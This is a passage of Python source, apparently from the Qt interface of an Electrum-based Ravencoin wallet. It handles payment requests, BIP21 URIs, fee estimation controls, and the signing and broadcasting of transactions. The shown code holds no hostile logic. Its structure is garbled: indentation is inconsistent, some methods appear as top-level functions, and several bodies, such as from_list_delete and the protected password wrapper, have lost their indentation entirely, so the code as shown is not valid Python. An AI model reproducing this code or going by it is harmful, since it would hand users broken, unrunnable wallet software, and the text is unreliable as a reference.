    vbox_g = QVBoxLayout()
    vbox_g.addLayout(grid)
    vbox_g.addStretch()
    hbox = QHBoxLayout()
    hbox.addLayout(vbox_g)
    hbox.addWidget(self.receive_qr)
    w = QWidget()
    w.searchable_list = self.request_list
    vbox = QVBoxLayout(w)
    vbox.addLayout(hbox)
    vbox.addStretch(1)
    vbox.addWidget(self.receive_requests_label)
    vbox.addWidget(self.request_list)
    vbox.setStretchFactor(self.request_list, 1000)
    return w
def delete_payment_request(self, addr):
    """Remove the stored payment request for *addr* and reset the receive tab."""
    self.wallet.remove_payment_request(addr, self.config)
    self.request_list.update()
    self.clear_receive_tab()
def get_request_URI(self, addr):
    """Build the BIP21 payment URI for the stored request at *addr*.

    Optional request fields (creation time, expiry, signature name/sig)
    are appended as extra query parameters; the signature is base58
    encoded.
    """
    req = self.wallet.receive_requests[addr]
    message = self.wallet.labels.get(addr, '')
    amount = req['amount']
    extra_query_params = {}
    created = req.get('time')
    if created:
        extra_query_params['time'] = str(int(created))
    expiry = req.get('exp')
    if expiry:
        extra_query_params['exp'] = str(int(expiry))
    if req.get('name') and req.get('sig'):
        sig_b58 = ravencoin.base_encode(bfh(req.get('sig')), base=58)
        extra_query_params['name'] = req['name']
        extra_query_params['sig'] = sig_b58
    uri = util.create_bip21_uri(addr, amount, message,
                                extra_query_params=extra_query_params)
    return str(uri)
def sign_payment_request(self, addr):
    """Sign the payment request at *addr* with the configured alias.

    A no-op unless an 'alias' is configured, its resolution result is
    available in self.alias_info, and the resolved alias address belongs
    to this wallet. Prompts for the wallet password when the keystore is
    encrypted; errors from signing are shown to the user.
    """
    alias = self.config.get('alias')
    # Removed dead local: `alias_privkey = None` was assigned but never used.
    if alias and self.alias_info:
        alias_addr, alias_name, validated = self.alias_info
        if alias_addr:
            if self.wallet.is_mine(alias_addr):
                msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
                password = None
                if self.wallet.has_keystore_encryption():
                    password = self.password_dialog(msg)
                    if not password:
                        # User cancelled: leave the request unsigned.
                        return
                try:
                    self.wallet.sign_payment_request(addr, alias, alias_addr, password)
                except Exception as e:
                    self.show_error(str(e))
                    return
            else:
                return
def save_payment_request(self):
    """Persist the receive tab's current fields as a payment request.

    Requires at least a message or an amount. On success the request is
    also signed (if an alias is configured) and the Save button disabled;
    the affected lists are refreshed in all cases.
    """
    addr = str(self.receive_address_e.text())
    amount = self.receive_amount_e.get_amount()
    message = self.receive_message_e.text()
    if not message and not amount:
        self.show_error(_('No message or amount'))
        return False
    # Map the combo index to its expiration duration (seconds or None).
    i = self.expires_combo.currentIndex()
    expiration = list(map(lambda x: x[1], expiration_values))[i]
    req = self.wallet.make_payment_request(addr, amount, message, expiration)
    try:
        self.wallet.add_payment_request(req, self.config)
    except Exception as e:
        self.logger.exception('Error adding payment request')
        self.show_error(_('Error adding payment request') + ':\n' + str(e))
    else:
        self.sign_payment_request(addr)
        self.save_request_button.setEnabled(False)
    finally:
        self.request_list.update()
        self.address_list.update()
        self.asset_list.update()
def view_and_paste(self, title, msg, data):
    """Show *data* in a modal dialog with a QR/text view and a copy button."""
    dialog = WindowModalDialog(self, title)
    layout = QVBoxLayout()
    caption = QLabel(msg)
    caption.setWordWrap(True)
    layout.addWidget(caption)
    text_view = ShowQRTextEdit(text=data)
    layout.addWidget(text_view)
    layout.addLayout(Buttons(CopyCloseButton(text_view.text, self.app, dialog)))
    dialog.setLayout(layout)
    dialog.exec_()
def export_payment_request(self, addr):
    """Serialize the request at *addr* as BIP70 and save it to a user-chosen file."""
    r = self.wallet.receive_requests.get(addr)
    pr = paymentrequest.serialize_request(r).SerializeToString()
    name = r['id'] + '.bip70'
    fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
    if not fileName:
        return
    with open(fileName, "wb+") as f:
        f.write(util.to_bytes(pr))
    self.show_message(_("Request saved successfully"))
    self.saved = True
def new_payment_request(self):
    """Point the receive tab at a fresh unused address for a new request.

    For deterministic wallets that have exhausted unused addresses, asks
    for confirmation before deriving one beyond the gap limit; for
    non-deterministic wallets, explains that no address can be created.
    """
    addr = self.wallet.get_unused_address()
    if addr is None:
        if not self.wallet.is_deterministic():
            msg = [
                _('No more addresses in your wallet.'),
                _('You are using a non-deterministic wallet, which cannot create new addresses.'),
                _('If you want to create new addresses, use a deterministic wallet instead.')
            ]
            self.show_message(' '.join(msg))
            return
        if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
            return
        addr = self.wallet.create_new_address(False)
    self.set_receive_address(addr)
    self.expires_label.hide()
    self.expires_combo.show()
    self.new_request_button.setEnabled(False)
    self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
    """Set the receive tab's address to *addr* and clear message/amount."""
    self.receive_address_e.setText(addr)
    self.receive_message_e.setText('')
    self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
    """Reset the receive tab to the wallet's current receiving address.

    Falls back to an empty address if the wallet reports internal address
    corruption (the error is shown to the user).
    """
    try:
        addr = self.wallet.get_receiving_address() or ''
    except InternalAddressCorruption as e:
        self.show_error(str(e))
        addr = ''
    self.receive_address_e.setText(addr)
    self.receive_message_e.setText('')
    self.receive_amount_e.setAmount(None)
    self.expires_label.hide()
    self.expires_combo.show()
def toggle_qr_window(self):
    """Show or hide the detached QR window, remembering its screen geometry."""
    from . import qrwindow
    if not self.qr_window:
        # First use: create, show, and record the initial geometry.
        self.qr_window = qrwindow.QR_Window(self)
        self.qr_window.setVisible(True)
        self.qr_window_geometry = self.qr_window.geometry()
    elif not self.qr_window.isVisible():
        # Re-show at the last remembered position.
        self.qr_window.setVisible(True)
        self.qr_window.setGeometry(self.qr_window_geometry)
    else:
        # Hide, remembering where it was.
        self.qr_window_geometry = self.qr_window.geometry()
        self.qr_window.setVisible(False)
    self.update_receive_qr()
def show_send_tab(self):
    """Bring the Send tab to the front."""
    send_index = self.tabs.indexOf(self.send_tab)
    self.tabs.setCurrentIndex(send_index)
def show_receive_tab(self):
    """Bring the Receive tab to the front."""
    receive_index = self.tabs.indexOf(self.receive_tab)
    self.tabs.setCurrentIndex(receive_index)
def receive_at(self, addr):
    """Switch to the Receive tab pre-filled with *addr* (ignored if invalid)."""
    if not ravencoin.is_address(addr):
        return
    self.show_receive_tab()
    self.receive_address_e.setText(addr)
    self.new_request_button.setEnabled(True)
def update_receive_qr(self):
    """Rebuild the BIP21 URI from the receive fields and refresh the QR widgets."""
    addr = str(self.receive_address_e.text())
    amount = self.receive_amount_e.get_amount()
    message = self.receive_message_e.text()
    # Saving only makes sense once there is an amount or a message.
    self.save_request_button.setEnabled((amount is not None) or (message != ""))
    uri = util.create_bip21_uri(addr, amount, message)
    self.receive_qr.setData(uri)
    # Mirror the QR into the detached window when it is open.
    if self.qr_window and self.qr_window.isVisible():
        self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
    """Color the receive address red (with a tooltip) when it was used before."""
    addr = str(self.receive_address_e.text())
    if not self.wallet.is_used(addr):
        self.receive_address_e.setStyleSheet("")
        self.receive_address_e.setToolTip("")
        return
    self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
    self.receive_address_e.setToolTip(_("This address has already been used. "
                                        "For better privacy, do not reuse it for new payments."))
def set_feerounding_text(self, num_satoshis_added):
    """Store the tooltip text explaining the fee-rounding delta in satoshis."""
    self.feerounding_text = (_('Additional {} satoshis are going to be added.')
                             .format(num_satoshis_added))
def create_send_tab(self):
    """Build the Send tab: payto/description/amount fields, fee controls
    (slider + advanced feerate/fee edits), action buttons and the invoice
    list. Returns the tab's root widget."""
    # A 4-column grid layout. All the stretch is in the last column.
    # The exchange rate plugin adds a fiat widget in column 2
    self.send_grid = grid = QGridLayout()
    grid.setSpacing(8)
    grid.setColumnStretch(3, 1)
    from .paytoedit import PayToEdit
    self.amount_e = BTCAmountEdit(self.get_decimal_point)
    self.payto_e = PayToEdit(self)
    msg = _('Recipient of the funds.') + '\n\n'\
          + _('You may enter a Ravencoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Ravencoin address)')
    payto_label = HelpLabel(_('Pay to'), msg)
    grid.addWidget(payto_label, 1, 0)
    grid.addWidget(self.payto_e, 1, 1, 1, -1)
    # Autocompletion of contacts in the payto field.
    completer = QCompleter()
    completer.setCaseSensitivity(False)
    self.payto_e.set_completer(completer)
    completer.setModel(self.completions)
    msg = _('Description of the transaction (not mandatory).') + '\n\n'\
          + _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
    description_label = HelpLabel(_('Description'), msg)
    grid.addWidget(description_label, 2, 0)
    self.message_e = MyLineEdit()
    grid.addWidget(self.message_e, 2, 1, 1, -1)
    # Coin-selection ("From") list; hidden until coins are explicitly chosen.
    self.from_label = QLabel(_('From'))
    grid.addWidget(self.from_label, 3, 0)
    self.from_list = FromList(self, self.from_list_menu)
    grid.addWidget(self.from_list, 3, 1, 1, -1)
    self.set_pay_from([])
    msg = _('Amount to be sent.') + '\n\n' \
          + _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
          + _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
          + _('Keyboard shortcut: type "!" to send all your coins.')
    amount_label = HelpLabel(_('Amount'), msg)
    grid.addWidget(amount_label, 4, 0)
    grid.addWidget(self.amount_e, 4, 1)
    # Fiat companion field; hidden unless the FX plugin is enabled.
    self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
    if not self.fx or not self.fx.is_enabled():
        self.fiat_send_e.setVisible(False)
    grid.addWidget(self.fiat_send_e, 4, 2)
    self.amount_e.frozen.connect(
        lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
    self.max_button = EnterButton(_("Max"), self.spend_max)
    self.max_button.setFixedWidth(self.amount_e.width())
    self.max_button.setCheckable(True)
    grid.addWidget(self.max_button, 4, 3)
    hbox = QHBoxLayout()
    hbox.addStretch(1)
    grid.addLayout(hbox, 4, 4)
    msg = _('Ravencoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
          + _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
          + _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
    self.fee_e_label = HelpLabel(_('Fee'), msg)

    def fee_cb(dyn, pos, fee_rate):
        # Fee-slider callback: persist the chosen level/rate, then refresh
        # the feerate edit and the transaction fee.
        if dyn:
            if self.config.use_mempool_fees():
                self.config.set_key('depth_level', pos, False)
            else:
                self.config.set_key('fee_level', pos, False)
        else:
            self.config.set_key('fee_per_kb', fee_rate, False)
        if fee_rate:
            fee_rate = Decimal(fee_rate)
            self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
        else:
            self.feerate_e.setAmount(None)
        self.fee_e.setModified(False)
        self.fee_slider.activate()
        self.spend_max() if self.max_button.isChecked() else self.update_fee()

    self.fee_slider = FeeSlider(self, self.config, fee_cb)
    self.fee_slider.setFixedWidth(self.amount_e.width())

    def on_fee_or_feerate(edit_changed, editing_finished):
        # Only one of fee / feerate may be "frozen" (user-set) at a time.
        edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
        if editing_finished:
            if edit_changed.get_amount() is None:
                # This is so that when the user blanks the fee and moves on,
                # we go back to auto-calculate mode and put a fee back.
                edit_changed.setModified(False)
        else:
            # edit_changed was edited just now, so make sure we will
            # freeze the correct fee setting (this)
            edit_other.setModified(False)
        self.fee_slider.deactivate()
        self.update_fee()

    class TxSizeLabel(QLabel):
        # Small label showing "x N bytes =" between feerate and fee edits.
        def setAmount(self, byte_size):
            self.setText(('x %s bytes =' % byte_size) if byte_size else '')

    self.size_e = TxSizeLabel()
    self.size_e.setAlignment(Qt.AlignCenter)
    self.size_e.setAmount(0)
    self.size_e.setFixedWidth(self.amount_e.width())
    self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
    self.feerate_e = FeerateEdit(lambda: 0)
    self.feerate_e.setAmount(self.config.fee_per_byte())
    self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
    self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
    self.fee_e = BTCAmountEdit(self.get_decimal_point)
    self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
    self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))

    def feerounding_onclick():
        # Explain why the displayed fee may differ from the computed one.
        text = (self.feerounding_text + '\n\n' +
                _('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
                _('At most 100 satoshis might be lost due to this rounding.') + ' ' +
                _("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
                _('Also, dust is not kept as change, but added to the fee.') + '\n' +
                _('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
        self.show_message(title=_('Fee rounding'), msg=text)

    self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
    self.feerounding_icon.setFixedWidth(round(2.2 * char_width_in_lineedit()))
    self.feerounding_icon.setFlat(True)
    self.feerounding_icon.clicked.connect(feerounding_onclick)
    self.feerounding_icon.setVisible(False)
    self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
    vbox_feelabel = QVBoxLayout()
    vbox_feelabel.addWidget(self.fee_e_label)
    vbox_feelabel.addStretch(1)
    grid.addLayout(vbox_feelabel, 5, 0)
    # Advanced fee controls row; hidden unless 'show_fee' is configured.
    self.fee_adv_controls = QWidget()
    hbox = QHBoxLayout(self.fee_adv_controls)
    hbox.setContentsMargins(0, 0, 0, 0)
    hbox.addWidget(self.feerate_e)
    hbox.addWidget(self.size_e)
    hbox.addWidget(self.fee_e)
    hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
    hbox.addStretch(1)
    vbox_feecontrol = QVBoxLayout()
    vbox_feecontrol.addWidget(self.fee_adv_controls)
    vbox_feecontrol.addWidget(self.fee_slider)
    grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
    if not self.config.get('show_fee', False):
        self.fee_adv_controls.setVisible(False)
    self.preview_button = EnterButton(_("Preview"), self.do_preview)
    self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
    self.send_button = EnterButton(_("Send"), self.do_send)
    self.clear_button = EnterButton(_("Clear"), self.do_clear)
    buttons = QHBoxLayout()
    buttons.addStretch(1)
    buttons.addWidget(self.clear_button)
    buttons.addWidget(self.preview_button)
    buttons.addWidget(self.send_button)
    grid.addLayout(buttons, 6, 1, 1, 3)
    self.amount_e.shortcut.connect(self.spend_max)
    self.payto_e.textChanged.connect(self.update_fee)
    self.amount_e.textEdited.connect(self.update_fee)

    def reset_max(text):
        # Typing a concrete amount cancels "Max" mode.
        self.max_button.setChecked(False)
        enable = not bool(text) and not self.amount_e.isReadOnly()
        self.max_button.setEnabled(enable)
    self.amount_e.textEdited.connect(reset_max)
    self.fiat_send_e.textEdited.connect(reset_max)

    def entry_changed():
        # Recolor amount/fee/feerate edits: red on insufficient funds,
        # blue for auto-filled values, default for user-entered ones.
        text = ""
        amt_color = ColorScheme.DEFAULT
        fee_color = ColorScheme.DEFAULT
        feerate_color = ColorScheme.DEFAULT
        if self.not_enough_funds:
            amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
            feerate_color = ColorScheme.RED
            text = _("Not enough funds")
            c, u, x = self.wallet.get_frozen_balance()
            if c+u+x:
                text += " ({} {} {})".format(
                    self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen")
                )
        # blue color denotes auto-filled values
        elif self.fee_e.isModified():
            feerate_color = ColorScheme.BLUE
        elif self.feerate_e.isModified():
            fee_color = ColorScheme.BLUE
        elif self.amount_e.isModified():
            fee_color = ColorScheme.BLUE
            feerate_color = ColorScheme.BLUE
        else:
            amt_color = ColorScheme.BLUE
            fee_color = ColorScheme.BLUE
            feerate_color = ColorScheme.BLUE
        self.statusBar().showMessage(text)
        self.amount_e.setStyleSheet(amt_color.as_stylesheet())
        self.fee_e.setStyleSheet(fee_color.as_stylesheet())
        self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
    self.amount_e.textChanged.connect(entry_changed)
    self.fee_e.textChanged.connect(entry_changed)
    self.feerate_e.textChanged.connect(entry_changed)

    self.invoices_label = QLabel(_('Invoices'))
    from .invoice_list import InvoiceList
    self.invoice_list = InvoiceList(self)
    vbox0 = QVBoxLayout()
    vbox0.addLayout(grid)
    hbox = QHBoxLayout()
    hbox.addLayout(vbox0)
    w = QWidget()
    vbox = QVBoxLayout(w)
    vbox.addLayout(hbox)
    vbox.addStretch(1)
    vbox.addWidget(self.invoices_label)
    vbox.addWidget(self.invoice_list)
    vbox.setStretchFactor(self.invoice_list, 1000)
    w.searchable_list = self.invoice_list
    run_hook('create_send_tab', grid)
    return w
def spend_max(self):
    """Check the Max button and recompute amount/fee to spend all coins.

    Plugins may veto via the 'abort_send' hook.
    """
    if run_hook('abort_send', self):
        return
    self.max_button.setChecked(True)
    self.do_update_fee()
def update_fee(self):
    """Schedule a fee recomputation; performed by timer_actions on its next tick."""
    self.require_fee_update = True
def get_payto_or_dummy(self):
    """Return the typed recipient, or a dummy wallet address for fee estimation."""
    recipient = self.payto_e.get_recipient()
    return recipient or (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
    '''Recalculate the fee. If the fee was manually input, retain it, but
    still build the TX to see if there are enough funds.
    '''
    freeze_fee = self.is_send_fee_frozen()
    freeze_feerate = self.is_send_feerate_frozen()
    amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
    if amount is None:
        # Nothing to compute: clear fee (unless user-frozen) and status.
        if not freeze_fee:
            self.fee_e.setAmount(None)
        self.not_enough_funds = False
        self.statusBar().showMessage('')
        return

    outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
    if not outputs:
        # No parsed outputs yet: estimate against a dummy recipient.
        _type, addr = self.get_payto_or_dummy()
        script = ravencoin.address_to_script(addr)
        outputs = [TxOutput(_type, addr, amount, False, '', script)]
    is_sweep = bool(self.tx_external_keypairs)
    make_tx = lambda fee_est: \
        self.wallet.make_unsigned_transaction(
            coins, outputs, self.config,
            fixed_fee=fee_est, is_sweep=is_sweep)
    try:
        tx = make_tx(fee_estimator)
        self.not_enough_funds = False
    except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
        if not freeze_fee:
            self.fee_e.setAmount(None)
        if not freeze_feerate:
            self.feerate_e.setAmount(None)
        self.feerounding_icon.setVisible(False)
        if isinstance(e, NotEnoughFunds):
            self.not_enough_funds = True
        elif isinstance(e, NoDynamicFeeEstimates):
            # No fee estimate available: still compute and show the tx size.
            try:
                tx = make_tx(0)
                size = tx.estimated_size()
                self.size_e.setAmount(size)
            except BaseException:
                pass
        return
    except BaseException:
        self.logger.exception('')
        return

    size = tx.estimated_size()
    self.size_e.setAmount(size)
    fee = tx.get_fee()
    fee = None if self.not_enough_funds else fee

    # Displayed fee/fee_rate values are set according to user input.
    # Due to rounding or dropping dust in CoinChooser,
    # actual fees often differ somewhat.
    if freeze_feerate or self.fee_slider.is_active():
        displayed_feerate = self.feerate_e.get_amount()
        if displayed_feerate is not None:
            displayed_feerate = quantize_feerate(displayed_feerate)
        else:
            # fallback to actual fee
            displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
            self.feerate_e.setAmount(displayed_feerate)
        displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
        self.fee_e.setAmount(displayed_fee)
    else:
        if freeze_fee:
            displayed_fee = self.fee_e.get_amount()
        else:
            # fallback to actual fee if nothing is frozen
            displayed_fee = fee
            self.fee_e.setAmount(displayed_fee)
        displayed_fee = displayed_fee if displayed_fee else 0
        displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
        self.feerate_e.setAmount(displayed_feerate)

    # show/hide fee rounding icon
    feerounding = (fee - displayed_fee) if fee else 0
    self.set_feerounding_text(int(feerounding))
    self.feerounding_icon.setToolTip(self.feerounding_text)
    self.feerounding_icon.setVisible(abs(feerounding) >= 1)

    if self.max_button.isChecked():
        # In Max mode the amount is derived from the tx, minus plugin fees.
        amount = tx.output_value()
        __, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
        amount_after_all_fees = amount - x_fee_amount
        self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
    def from_list_menu(self, position):
        """Context menu for the 'Pay from' list: offers removing the coin."""
        item = self.from_list.itemAt(position)
        menu = QMenu()
        menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
        menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # sat/byte feerate
amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_send_tab(self):
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
    def check_send_tab_outputs_and_show_errors(self, outputs) -> bool:
        """Returns whether there are errors with outputs.
        Also shows error dialog to user if so.
        """
        pr = self.payment_request
        if pr:
            if pr.has_expired():
                self.show_error(_('Payment request has expired'))
                return True
        # Free-form payto input is only validated when no payment request
        # dictates the outputs.
        if not pr:
            errors = self.payto_e.get_errors()
            if errors:
                self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
                return True
            # Alias resolved but its DNSSEC check failed: warn, let user decide.
            if self.payto_e.is_alias and self.payto_e.validated is False:
                alias = self.payto_e.toPlainText()
                msg = _('WARNING: the alias "{}" could not be validated via an additional '
                        'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
                msg += _('Do you wish to continue?')
                if not self.question(msg):
                    return True
        if not outputs:
            self.show_error(_('No outputs'))
            return True
        for o in outputs:
            if o.address is None:
                self.show_error(_('Ravencoin Address is None'))
                return True
            if o.type == TYPE_ADDRESS and not ravencoin.is_address(o.address):
                self.show_error(_('Invalid Ravencoin Address'))
                return True
            if o.value is None:
                self.show_error(_('Invalid Amount'))
                return True
        return False  # no errors
    def do_preview(self):
        """Build the transaction and show it without broadcasting."""
        self.do_send(preview = True)
    def do_send(self, preview = False):
        """Validate the send tab, build an unsigned transaction, confirm it
        with the user (asking for the wallet password if needed), then sign
        and broadcast it. With preview=True the tx is only displayed.
        """
        if run_hook('abort_send', self):
            return
        outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
        if self.check_send_tab_outputs_and_show_errors(outputs):
            return
        try:
            is_sweep = bool(self.tx_external_keypairs)
            tx = self.wallet.make_unsigned_transaction(
                coins, outputs, self.config, fixed_fee=fee_estimator,
                is_sweep=is_sweep)
        except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
            # Expected user-level failures: report, don't log.
            self.show_message(str(e))
            return
        except InternalAddressCorruption as e:
            # Serious wallet corruption: show AND re-raise so it is not lost.
            self.show_error(str(e))
            raise
        except BaseException as e:
            self.logger.exception('')
            self.show_message(str(e))
            return
        amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs))
        fee = tx.get_fee()
        #use_rbf = self.config.get('use_rbf', True)
        #if use_rbf:
        #    tx.set_rbf(True)
        # Reject fees below the server relay floor; the tx would be dropped.
        if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
            self.show_error('\n'.join([
                _("This transaction requires a higher fee, or it will not be propagated by your current server"),
                _("Try to raise your transaction fee, or use a server with a lower relay fee.")
            ]))
            return
        if preview:
            self.show_transaction(tx, tx_desc)
            return
        if not self.network:
            self.show_error(_("You can't broadcast a transaction without a live network connection."))
            return
        # confirmation dialog
        msg = [
            _("Amount to be sent") + ": " + self.format_amount_and_units(amount),
            _("Mining fee") + ": " + self.format_amount_and_units(fee),
        ]
        x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
        if x_fee:
            x_fee_address, x_fee_amount = x_fee
            msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
        feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
        if fee > feerate_warning * tx.estimated_size() / 1000:
            msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
        if self.wallet.has_keystore_encryption():
            msg.append("")
            msg.append(_("Enter your password to proceed"))
            password = self.password_dialog('\n'.join(msg))
            if not password:
                return
        else:
            msg.append(_('Proceed?'))
            password = None
            if not self.question('\n'.join(msg)):
                return
        def sign_done(success):
            if success:
                if not tx.is_complete():
                    # Partially signed (e.g. multisig): show for further signing.
                    self.show_transaction(tx)
                    self.do_clear()
                else:
                    self.broadcast_transaction(tx, tx_desc)
        self.sign_tx_with_password(tx, sign_done, password)
    @protected
    def sign_tx(self, tx, callback, password):
        """Sign *tx*; @protected prompts for the wallet password first."""
        self.sign_tx_with_password(tx, callback, password)
    def sign_tx_with_password(self, tx, callback, password):
        '''Sign the transaction in a separate thread. When done, calls
        the callback with a success code of True or False.
        '''
        def on_success(result):
            callback(True)
        def on_failure(exc_info):
            self.on_error(exc_info)
            callback(False)
        # Plugins (e.g. trustedcoin) may wrap the success handler.
        on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
        if self.tx_external_keypairs:
            # can sign directly
            task = partial(Transaction.sign, tx, self.tx_external_keypairs)
        else:
            task = partial(self.wallet.sign_transaction, tx, password)
        msg = _('Signing transaction...')
        WaitingDialog(self, msg, task, on_success, on_failure)
    def broadcast_transaction(self, tx, tx_desc):
        """Broadcast *tx* on a worker thread, then report the result in the
        GUI; on success also marks any active payment request as paid."""
        def broadcast_thread():
            # non-GUI thread
            pr = self.payment_request
            if pr and pr.has_expired():
                self.payment_request = None
                return False, _("Payment request has expired")
            status = False
            try:
                self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
            except TxBroadcastError as e:
                msg = e.get_message_for_gui()
            except BestEffortRequestFailed as e:
                msg = repr(e)
            else:
                status, msg = True, tx.txid()
            if pr and status is True:
                self.invoices.set_paid(pr, tx.txid())
                self.invoices.save()
                self.payment_request = None
                refund_address = self.wallet.get_receiving_address()
                # BIP70 payment ACK round-trip with the merchant server.
                coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
                fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
                ack_status, ack_msg = fut.result(timeout=20)
                self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
            return status, msg
        # Capture current TL window; override might be removed on return
        parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
        def broadcast_done(result):
            # GUI thread
            if result:
                status, msg = result
                if status:
                    if tx_desc is not None and tx.is_complete():
                        self.wallet.set_label(tx.txid(), tx_desc)
                    parent.show_message(_('Payment sent.') + '\n' + msg)
                    self.invoice_list.update()
                    self.do_clear()
                else:
                    msg = msg or ''
                    parent.show_error(msg)
        WaitingDialog(self, _('Broadcasting transaction...'),
                      broadcast_thread, broadcast_done, self.on_error)
    def query_choice(self, msg, choices):
        # Needed by QtHandler for hardware wallets
        """Modal radio-button chooser; returns the selected index or None."""
        dialog = WindowModalDialog(self.top_level_window())
        clayout = ChoicesLayout(msg, choices)
        vbox = QVBoxLayout(dialog)
        vbox.addLayout(clayout.layout())
        vbox.addLayout(Buttons(OkButton(dialog)))
        if not dialog.exec_():
            return None
        return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
    def prepare_for_payment_request(self):
        """Freeze the send tab while a payment request is being fetched."""
        self.show_send_tab()
        self.payto_e.is_pr = True
        for e in [self.payto_e, self.message_e]:
            e.setFrozen(True)
        self.lock_amount(True)
        self.payto_e.setText(_("please wait..."))
        return True
    def delete_invoice(self, key):
